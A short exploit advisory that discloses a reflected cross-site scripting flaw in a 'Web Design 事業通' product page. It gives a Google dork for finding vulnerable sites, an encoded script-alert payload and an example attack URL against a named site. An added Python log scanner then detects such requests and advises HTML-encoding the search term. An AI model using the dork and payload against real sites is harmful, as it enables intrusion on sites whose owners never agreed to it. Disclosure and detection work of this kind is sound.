|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Web Design 事業通 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://tw.sayato.com/
|[+]
|[+] Google Dork: intext:"Web Design 事業通" products2.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 24 01 2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search the dork, choose a target, and append "%3Cscript%3Ealert%28%29%3C%2Fscript%3E" to the URL
|[+] to see the vulnerability.
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://www.twdrybox.com/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|[+] tnQ : Mahdi.Hidden , Ac!D
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
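
Defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for products2.php requests whose sarch_pd value decodes to HTML markup. The log lines, addresses and function names are constructed for illustration, and the markup pattern is a heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic: markup that has no business in a product search term.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:', re.I)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_search(line, path="/products2.php", param="sarch_pd"):
    """Return the decoded parameter value if it carries markup, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(path):
        return None
    # parse_qs decodes once; decode_fully catches double-encoded values.
    for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
        value = decode_fully(raw)
        if MARKUP_RE.search(value):
            return value
    return None

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2016:10:00:01 +0000] "GET /products2.php?submit=GO&sarch_pd=dry+cabinet HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jan/2016:10:00:05 +0000] "GET /products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E HTTP/1.1" 200 5188 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jan/2016:10:00:09 +0000] "GET /products2.php?submit=GO&sarch_pd=%253Cscript%253Ealert%25282%2529%253C%252Fscript%253E HTTP/1.1" 200 5190 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [24/Jan/2016:10:01:00 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (line number, decoded value) for every flagged request."""
    return [(i, hit) for i, line in enumerate(lines, 1)
            if (hit := suspicious_search(line))]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: sarch_pd carries markup: {value!r}")
```

A hit in the logs only shows that the request was made; the fix on the server is to HTML-encode the search term wherever it is written back into the page.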